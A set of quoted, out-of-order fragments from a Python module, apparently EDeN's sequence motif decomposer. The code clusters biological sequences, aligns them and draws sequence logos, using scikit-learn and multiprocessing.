"self.max_subarray_size = max_subarray_size self.pos_block_size = pos_block_size self.neg_block_size = neg_block_size self.n_jobs = n_jobs self.vectorizer",
"args=(seqs, vectorizer)) for seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() -",
"= self._decompose_header(header) orig_header, score, begin, end, subseq = components p = self.compute_p_value(score) if",
"logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = [] info = ' - num subarrays: %d'",
"vectorizer.transform(iterable) return data_matrix def chunks(iterable, n): \"\"\"chunks.\"\"\" iterable = iter(iterable) while True: items",
"[apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs'",
"(h, s[start:end]) def plot_cumulative_score(smod, seqs, size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs, smod)",
"% (i, size, d_time, d_loc_time)) pool.close() pool.join() data_matrix = vstack(matrices) return data_matrix def",
"creating sequence.\"\"\" def __init__(self, output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False, #",
"len(code) == 1: code_str = code[0] else: code_str = '(' + '|'.join(code) +",
"is_high_quality, motif = self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if is_high_quality: motives[cluster_id]",
"% \\ (j, i, n_i + n_j) logger.debug(info1 + info2) # update motives",
"motives, nbins=40, size=(17, 2), output_type='screen', fname=None): \"\"\"Report in markdown format.\"\"\" txt = []",
"i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix = p.get() y",
"mp.Pool(n_jobs) results = [apply_async( pool, serial_subarray, args=(seqs, vectorizer, estimator, min_subarray_size, max_subarray_size)) for seqs",
"wbl.LogoFormat(data, self.options) if self.output_format == 'png': return wbl.png_formatter(data, format) elif self.output_format == 'png_print':",
"in re.finditer(needle, s): s = match.start() e = match.end() m = s +",
"for id in motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq = occurrences(c_regex, seqs)",
"vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: yield self._decompose_header(header)",
"format) else: return wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self,",
"< len(cluster_seqs): orders.append(int(id1)) if id2 < len(cluster_seqs): orders.append(int(id2)) return orders def _compute_consensus_seq(self, align_seqs):",
"info = ' - %.2s %s' % \\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for freq,",
"occurrences') if fname: plt.draw() figname = '%s_loc_%d.png' % (fname, cluster_id) plt.savefig( figname, bbox_inches='tight',",
"plt.close() return figname # ------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable) return",
"std_loc = 0 return avg_loc, std_loc def hits(motives, ids=None): \"\"\"hits.\"\"\" for i in",
"b:%.2f' % (self.a, self.b)) def predict(self, value): \"\"\"pvalue.\"\"\" y = sigmoid(value, self.a, self.b)",
"haystack): \"\"\"extract_location.\"\"\" locs = [] for h, s in haystack: for match in",
"\"\"\"extract_location.\"\"\" locs = [] for h, s in haystack: for match in re.finditer(needle,",
"= logo_range[0] options.logo_end = logo_range[1] options.scale_width = scale_stack_widths options.show_errorbars = error_bars if title:",
"pos_data_matrix d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time size =",
"transform(self, seqs=[]): \"\"\"Carry out alignment.\"\"\" headers, data = self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data) aligned_seqs",
"and compute their gram matrix K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs,",
"if ids is None: ids = [id for id in motives] seqs_summary =",
"start_time)) logger.debug('Performance evaluation') start_time = time.time() preds = [] binary_preds = [] true_targets",
"= [] binary_preds = [] true_targets = [] for i, (p, n) in",
"sklearn.base import BaseEstimator, ClassifierMixin from sklearn.linear_model import SGDClassifier from sklearn.cluster import MiniBatchKMeans from",
"end, p, subseq except Exception as e: logger.debug('Failed iteration. Reason: %s' % e)",
"begin, end, p, subseq except Exception as e: logger.debug('Failed iteration. Reason: %s' %",
"cluster_id in clusters: if len(clusters[cluster_id]) > 0: seqs = [s for h, s",
"sample_size=sample_size) motives = self.merge( motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives =",
"+= '<score>%.4f<score>' % (score) header += '<subseq>%s<subseq>' % (subseq_seq) subseq = (header, seq)",
"self.random_state = random_state self.a = -4 self.b = 1 def ecdf(self, x): \"\"\"Empirical",
"average location: %.1f +- %.1f' % (av, st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i",
"preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit = True dtime = time.time() - start_time",
"data_matrix.shape[0]) start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix) else: preds =",
"subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on %d instances' % data_matrix.shape[0]) start_time =",
"info = ' - consensus regex: %s' % motif['regex_seq'] logo_txt.append(info) return logo_image, logo_txt",
"\"\"\"multiprocess_subarray.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool() else: pool",
"import metrics from eden.util.NeedlemanWunsh import edit_distance import random import pylab as plt import",
"% len(motives) txt.append(info) figname = plot_cumulative_score( self, pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for",
"fname=fname) txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_' * 100) else: logger.warning( 'No motives to report.",
"Seq from Bio.SeqRecord import SeqRecord from corebio.seq import Alphabet, SeqList import weblogolib as",
"preds = np.hstack(preds) binary_preds = np.hstack(binary_preds) true_targets = np.hstack(true_targets) return preds, binary_preds, true_targets",
"%.2f secs' % (time.time() - start_time)) logger.debug('Predicting') start_time = time.time() scores_items = []",
"start_time logger.debug('...done in %.2f secs' % (dtime)) self.clusters = defaultdict(list) for pred, seq",
"row in enumerate(cluster.T): c = Counter(row) k = c.most_common() l = letter_regex(k, size,",
"return wbl.png_print_formatter(data, format) elif self.output_format == 'jpeg': return wbl.jpeg_formatter(data, format) else: return wbl.eps_formatter(data,",
"count / float(size) > regex_th: if letter != '-': code.append(letter) if len(code) ==",
"return code def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for h, s in haystack: matches =",
"items.append(it) yield items def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time = time.time() if",
"pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time = time.time() if n_jobs == -1: pool =",
"= c_i - c_j distances[(i, j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list",
"min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if is_high_quality: info1 = 'Joining: %d (#%d), %d (#%d) score:",
"as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _order_clusters(self, clusters,",
"Weblogo(object): \"\"\"A wrapper of weblogolib for creating sequence.\"\"\" def __init__(self, output_format='png', # ['eps','png','png_print','jpeg']",
"\"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle, haystack)) size = len(haystack) return counts, float(counts) / size",
"fname + '\" style=\"width: 100%\"></p>') else: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://'",
"0] = 0 plt.bar(range(len(sign)), sign, alpha=0.3, color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance score') if fname:",
"ids is None: ids = [id for id in motives] seqs_summary = defaultdict(list)",
"id2 in c[:, 0:2]: if id1 < len(cluster_seqs): orders.append(int(id1)) if id2 < len(cluster_seqs):",
"orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list = [] for i, row in enumerate(cooccurence_mtx): norm =",
"%d (#%d) (%.2f secs)' % (cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After motives computation, %d motives'",
"loc_start_time size = pos_data_matrix.shape logger.debug('%d %s (%.2f secs) (delta: %.2f)' % (i, size,",
"(%.2f secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() preds =",
"motif finder algorithm. @author: <NAME> @email: <EMAIL> \"\"\" import logging import multiprocessing as",
"= np.median([len(s) for h, s in seqs]) sigs = None for scores in",
"return wbl.jpeg_formatter(data, format) else: return wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\"",
"Alphabet('AGCT') motif_corebio = SeqList(alist=instances, alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data, self.options) if",
"(len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def compute_p_value(self, value): \"\"\"p_value.\"\"\" y",
"%d motives' % len(_motives)) return _motives def select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5,",
"motives[cluster_id]['freq'] info = ' - num occurrences of regex: %d' % (co) txt.append(info)",
"= \"\" line_str = str(line) yield line_str.strip() else: line_str = line.split() if line_str:",
"wbl.std_color_schemes[color_scheme] options.resolution = resolution if fineprint: options.fineprint = fineprint self.options = options self.output_format",
"pwd = os.getcwd() url = pwd + '/' + fname txt = []",
"letter, count in k: if count / float(size) > regex_th: if letter !=",
"neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self except Exception as e: logger.debug('Failed iteration. Reason: %s'",
"row in enumerate(cluster.T): c = Counter(row) k = c.most_common() code = '' for",
"distances, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_' * 100) else: logger.warning( 'No",
"secs' % (time.time() - start_time)) logger.debug('Annotating') start_time = time.time() subarrays_items = [] for",
"plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g') sign = np.copy(sig) sign[sign >= 0] = 0 plt.bar(range(len(sign)),",
"= time.time() - loc_start_time logger.debug('%d (%.2f secs) (delta: %.2f)' % (i, d_time, d_loc_time))",
"end, p, subseq in iterable: new_header = header new_header += '<loc>' + str(begin)",
"= 1 - y return p_val def compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences",
"%d motives' % len(self.clusters)) return self.clusters except Exception as e: logger.debug('Failed iteration. Reason:",
"ecdf(self, x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys = np.arange(1, len(xs)",
"seqs in chunks(iterable, pos_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Vectorizing') start_time",
"pool = mp.Pool() else: pool = mp.Pool(n_jobs) pos_results = [apply_async( pool, serial_pre_process, args=(seqs,",
"self.merge( motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.quality_filter( seqs, motives,",
"not clusters: raise Exception('Error: No clusters.') mcs = min_cluster_size logger.debug('Alignment') motives = dict()",
"time.time() # align with muscle is_high_quality, motif = self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs,",
"logo_txts: txt.append(logo_txt) co = motives[cluster_id]['counts'] fr = motives[cluster_id]['freq'] info = ' - num",
"matrix cm = metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm) # classification logger.info('Classification:') logger.info(metrics.classification_report(y_test,",
"- start_time)) logger.debug('Performance evaluation') start_time = time.time() preds = [] binary_preds = []",
"elif self.output_format == 'jpeg': return wbl.jpeg_formatter(data, format) else: return wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------",
"occurrences of regex: %.2f' % (fr) txt.append(info) av = motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos']",
"the predictor to learn the new class definition logger.debug('After merge, %d motives' %",
"num subarrays: %d' % len(motif['seqs']) logo_txt.append(info) info = ' - consensus sequence: %s'",
"pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self except Exception as e: logger.debug('Failed iteration. Reason:",
"= estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time",
"ids = [id for id in motives] seqs_summary = defaultdict(list) for seq_id, begin,",
"= logging.getLogger(__name__) def sigmoid(x, a, b): \"\"\"sigmoid.\"\"\" return 1 / (1 + np.exp(-(x",
"s[start:end]) def plot_cumulative_score(smod, seqs, size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs, smod) plt.figure(figsize=size)",
"yield 1 else: yield 0 def occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle, haystack))",
"ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs = random.sample(seqs, sample_size) else: sample_seqs",
"logger.debug('val:%.1f beg:%s end:%s width:%s' % (val, start, end, width)) for h, s in",
"complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity =",
"diags=False, maxiters=16, maxhours=None, # TODO: check if this alphabet is required # it",
"min_freq=min_freq) if score >= min_score and len(align_seqs) > min_cluster_size: return True else: return",
"rel_nw_score > similarity_th: yield rel_nw_score, i, j def merge(self, motives, similarity_th=0.5, min_score=4, min_freq=0.5,",
"in enumerate(results): loc_start_time = time.time() subarrays_item = p.get() subarrays_items += subarrays_item d_time =",
"rel_nw_score, i, j def merge(self, motives, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\"",
"self.output_format == 'png_print': return wbl.png_print_formatter(data, format) elif self.output_format == 'jpeg': return wbl.jpeg_formatter(data, format)",
"score = header.split('<score>')[1] score = float(score) loc = header.split('<loc>')[1] begin, end = loc.split(':')",
"for i in range(len(ids) - 1): start = ids[i] end = ids[i +",
"self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.merge( motives, similarity_th=similarity_th, min_score=min_score,",
"(i, size, d_time, d_loc_time)) pool.close() pool.join() preds = np.hstack(preds) binary_preds = np.hstack(binary_preds) true_targets",
"logger.info(metrics.classification_report(y_test, y_binary)) # roc logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred))) except Exception as e:",
"for (orig_header, orig_seq), (seq, score) in zip(iterable, annotated_seqs): subarrays = compute_max_subarrays_sequence( seq=seq, score=score,",
"instances' % data_matrix.shape[0]) start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix) else:",
"occurrences of regex: %d' % (co) txt.append(info) info = ' - freq of",
"e) logger.debug('Exception', exc_info=True) def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b = -4, 1 scores",
"len(cluster_seqs): orders.append(int(id1)) if id2 < len(cluster_seqs): orders.append(int(id2)) return orders def _compute_consensus_seq(self, align_seqs): cluster",
"motives: if j > i: seq_i = motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq'] nw_score =",
"def _compute_consensus_seq(self, align_seqs): cluster = [] for h, align_seq in align_seqs: str_list =",
"scores d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time logger.debug('%d (%.2f",
"for cluster_id in clusters: if len(clusters[cluster_id]) > 0: seqs = [s for h,",
"txt.append(info) if len(ds): figname = plot_distance( cluster_id, j, regex_i, regex_j, distances, nbins=nbins, size=size,",
"= motives[i]['seqs'] + motives[j]['seqs'] is_high_quality, motif = self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th,",
"c = Counter(row) k = c.most_common() code = '' for i, row in",
"_save_logo(self, logo, cluster_id, fname): imagename = '%s_logo_cl_%d.png' % (fname, cluster_id) with open(imagename, 'wb')",
"%d != %d' % (len(sig), median_len)) if sigs is None: if len(sig) >=",
"= max_subarray_size self.pos_block_size = pos_block_size self.neg_block_size = neg_block_size self.n_jobs = n_jobs self.vectorizer =",
"[] for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix =",
"sample_size=sample_size) if is_high_quality: info1 = 'Joining: %d (#%d), %d (#%d) score: %.2f' %",
"chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Annotating') start_time = time.time()",
"for i in range(half_windw_size, sig_len - half_windw_size): min_sig = np.min(sig[i - half_windw_size:i +",
"h, s in seqs: if s[start:end]: yield (h, s[start:end]) def plot_cumulative_score(smod, seqs, size=(6,",
"(self.a, self.b)) def compute_p_value(self, value): \"\"\"p_value.\"\"\" y = sigmoid(value, self.a, self.b) p_val =",
"min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs, p_value=p_value) motives",
"logger.debug('working on %d instances' % data_matrix.shape[0]) start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds",
"): \"\"\"Initialize an instance.\"\"\" options = wbl.LogoOptions() options.stacks_per_line = stacks_per_line options.sequence_type = sequence_type",
"output_format def create_logo(self, seqs=[]): \"\"\"Create sequence logo for input sequences.\"\"\" # seperate headers",
"while True: items = [] for i in range(n): it = iterable.next() items.append(it)",
"dict() for cluster_id in ids: logo_image, logo_txt = self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] =",
"cumulative distribution.\"\"\" def __init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state = random_state self.a = -4 self.b",
"seq_j, gap_penalty=-1) rel_nw_score = 2 * nw_score / (len(seq_i) + len(seq_j)) if rel_nw_score",
"= sep.join(seqs) cluster_seqs.append(seq) # vectorize the seqs and compute their gram matrix K",
"= header.split('<subseq>')[1] orig_header = header.split('<loc>')[0] return orig_header, score, begin, end, subseq def decompose(self,",
"= 1 - y return p_val def ecdf(x): \"\"\"Empirical cumulative distribution function.\"\"\" xs",
"0 to_be_removed = [] for i, row in enumerate(cluster.T): c = Counter(row) k",
"self.ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b = popt else: logger.debug('Warning:",
"compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if ids is None: ids = [id for id in",
"import logging import multiprocessing as mp import os from collections import defaultdict from",
"merge, %d motives' % len(motives)) return motives def quality_filter(self, seqs=None, motives=None, freq_th=None, std_th=None):",
"= 0 return avg_loc, std_loc def hits(motives, ids=None): \"\"\"hits.\"\"\" for i in ids:",
"bins, patches = plt.hist( ds, nbins, normed=0, facecolor='green', alpha=0.3) plt.grid() plt.title('%s vs %s'",
"from sklearn.linear_model import SGDClassifier from sklearn.cluster import MiniBatchKMeans from eden.sequence import Vectorizer from",
"= ' - average location: %.1f +- %.1f' % (av, st) txt.append(info) txt.append(self._wrap_image(figname,",
"fill_width=True, output_type='screen'): pwd = os.getcwd() url = pwd + '/' + fname txt",
"= ma.transform(seqs=sample_seqs) score, trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and len(align_seqs)",
"headers headers, instances = [list(x) for x in zip(*seqs)] instances_seqrecord = [] for",
"/ (len(seq_i) + len(seq_j)) if rel_nw_score > similarity_th: yield rel_nw_score, i, j def",
"- 1): start = ids[i] end = ids[i + 1] width = end",
"obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator = multiprocess_fit( pos_seqs,",
"(header, seq) subseqs.append(subseq) subarrays_items += subseqs return subarrays_items def multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5,",
"in motives: if j > i: seq_i = motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq'] nw_score",
"def _wrap_image(self, fname, fill_width=True, output_type='screen'): pwd = os.getcwd() url = pwd + '/'",
"pred, seq in zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After clustering, %d motives' % len(self.clusters)) return",
"for i, a in enumerate(align_seq) if i not in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return",
"line.split() if line_str: seq += str(line_str[0]).strip() if seq: yield seq # ------------------------------------------------------------------------------ class",
"= occurrences(regex_seq, seqs) motives[cluster_id]['freq'] = freq motives[cluster_id]['counts'] = counts avg, std = extract_location(regex_seq,",
"markdown format.\"\"\" txt = [] if motives: _, norm_cooccurence_mtx, distances = compute_cooccurence(motives) info",
"estimator, min_subarray_size, max_subarray_size)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time()",
"def chunks(iterable, n): \"\"\"chunks.\"\"\" iterable = iter(iterable) while True: items = [] for",
"code_str = code[0] else: code_str = '(' + '|'.join(code) + ')' return code_str",
"= sum(find_occurrences(needle, haystack)) size = len(haystack) return counts, float(counts) / size def extract_consensus(seqs,",
"xs, ys = ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b =",
"\\ (i, n_i, j, n_j, rel_nw_score) info2 = ' deleting: %d [%d is",
"compute_max_subarrays_sequence from itertools import izip import time from sklearn.base import BaseEstimator, ClassifierMixin from",
"return zip(headers, motif_seqs) def transform(self, seqs=[]): \"\"\"Carry out alignment.\"\"\" headers, data = self._seq_to_stdin_fasta(seqs)",
"True: ms = sorted([m for m in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True) success =",
"- num subarrays: %d' % len(motif['seqs']) logo_txt.append(info) info = ' - consensus sequence:",
"p_value=p_value) motives = self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.merge(",
"scores: xs, ys = ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b",
"min_freq=min_freq) if score >= min_score and len(align_seqs) > min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq",
"= len(haystack) return counts, float(counts) / size def extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\" for",
"in haystack: matches = re.findall(needle, s, overlapped=True) if len(matches): yield 1 else: yield",
"self.diags = diags self.maxiters = maxiters self.maxhours = maxhours if alphabet == 'protein':",
"format) elif self.output_format == 'png_print': return wbl.png_print_formatter(data, format) elif self.output_format == 'jpeg': return",
"PValueEvaluator(object): \"\"\"Fit a parametrized sigmoid on the empirical cumulative distribution.\"\"\" def __init__(self, random_state=1):",
"= [] if fill_width: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url",
"* 2) # join all sequences in a cluster with enough space that",
"options self.output_format = output_format def create_logo(self, seqs=[]): \"\"\"Create sequence logo for input sequences.\"\"\"",
"%.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return scores_items # ------------------------------------------------------------------------------ def _fasta_to_fasta(lines):",
"k[1][1] else: val = k[0][1] if float(val) / dim >= min_freq: score +=",
"plt.close() return figname def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig) for i in",
"median_len)) if sigs is None: if len(sig) >= median_len: sigs = sig[:median_len] else:",
"(dtime)) self.clusters = defaultdict(list) for pred, seq in zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After clustering,",
"vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score except Exception as e: logger.debug('Failed iteration. Reason:",
"seqs = [s for h, s in clusters[cluster_id]] seq = sep.join(seqs) cluster_seqs.append(seq) #",
"= motives[cluster_id]['regex_seq'] figname = plot_location( regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type))",
"stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = [] info = ' -",
"k: if count / float(size) > regex_th: if letter != '-': code.append(letter) if",
"trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and len(align_seqs) > min_cluster_size: return",
"self.clusterer = clusterer self.clusterer_is_fit = False def save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1)",
"in subarrays_items: yield self._decompose_header(header) except Exception as e: logger.debug('Failed iteration. Reason: %s' %",
"= re.findall(needle, s, overlapped=True) if len(matches): yield 1 else: yield 0 def occurrences(needle,",
"- start_time)) logger.debug('Fitting') start_time = time.time() for i, (p, n) in enumerate(izip(pos_results, neg_results)):",
"consensus regex: %s' % motif['regex_seq'] logo_txt.append(info) return logo_image, logo_txt def compute_logos(self, motives, ids=None):",
"(fname, cluster_id) with open(imagename, 'wb') as f: f.write(logo) return imagename def _wrap_image(self, fname,",
"sample_size=sample_size) motives = self.quality_filter( seqs, motives, freq_th=freq_th, std_th=std_th) return motives def compute_logo(self, cluster_id=None,",
"pool = mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_pre_process, args=(seqs,",
"i in cluster_ids: for j in cluster_ids: cooccurence_mtx[i, j] += 1 if i",
"\"\"\"hits.\"\"\" for i in ids: for h, s in motives[i]['seqs']: tokens = h.split('<loc>')",
"logger.debug('After merge, %d motives' % len(motives)) return motives def quality_filter(self, seqs=None, motives=None, freq_th=None,",
"cluster = [] for h, align_seq in align_seqs: str_list = [c for c",
"figname = plot_cumulative_score( self, pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for freq, cluster_id in",
"' - num subarrays: %d' % len(motif['seqs']) logo_txt.append(info) info = ' - consensus",
"n.get() y += [-1] * neg_data_matrix.shape[0] y = np.array(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix])",
"+= [-1] * neg_data_matrix.shape[0] y = np.array(y) true_targets.append(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) pred",
"_motives def select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None, std_th=None):",
"patches = plt.hist( ds, nbins, normed=0, facecolor='green', alpha=0.3) plt.grid() plt.title('%s vs %s' %",
"= mp.Pool(n_jobs) results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(iterable,",
"return logo_image, logo_txt def compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\" if motives: if ids is",
"else: figname = None plt.show() plt.close() return figname def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len",
"<EMAIL> \"\"\" import logging import multiprocessing as mp import os from collections import",
"ids[i + 1] width = end - start val = sum(sig[start:end]) yield val,",
"= end - start val = sum(sig[start:end]) yield val, start, end, width def",
"list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = [''] * len(headers) for i in range(len(out[:-1]))[::2]: id = int(out[i].split('",
"aligned_seqs = self._fasta_to_seqs(headers, stdout) return aligned_seqs # ------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A wrapper of",
"matrix:') logger.info(cm) # classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) # roc logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test,",
"list(mean_shift_decomposition(sig, half_windw_size)) for i in range(len(ids) - 1): start = ids[i] end =",
"f.write(logo) return imagename def _wrap_image(self, fname, fill_width=True, output_type='screen'): pwd = os.getcwd() url =",
"as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def score(self, seqs=None):",
"similarity_th=similarity_th)], reverse=True) success = False for rel_nw_score, i, j in ms: if motives.get(i,",
"= s + (e - s) / 2 locs.append(m) plt.figure(figsize=size) n, bins, patches",
"(i, size, d_time, d_loc_time)) pool.close() pool.join() data_matrix = vstack(matrices) return data_matrix def multiprocess_fit(pos_iterable,",
"pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_subarray, args=(seqs, vectorizer, estimator, min_subarray_size, max_subarray_size))",
"# TODO: run the predictor to learn the new class definition logger.debug('After merge,",
"e = match.end() m = s + (e - s) / 2 locs.append(m)",
"yield freq, id, c_regex, counts, motives[id]['consensus_seq'] def plot_location(needle, haystack, cluster_id=None, nbins=20, size=(17, 2),",
"* pos_data_matrix.shape[0] neg_data_matrix = n.get() y += [-1] * neg_data_matrix.shape[0] y = np.array(y)",
"logos = dict() for cluster_id in ids: logo_image, logo_txt = self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id])",
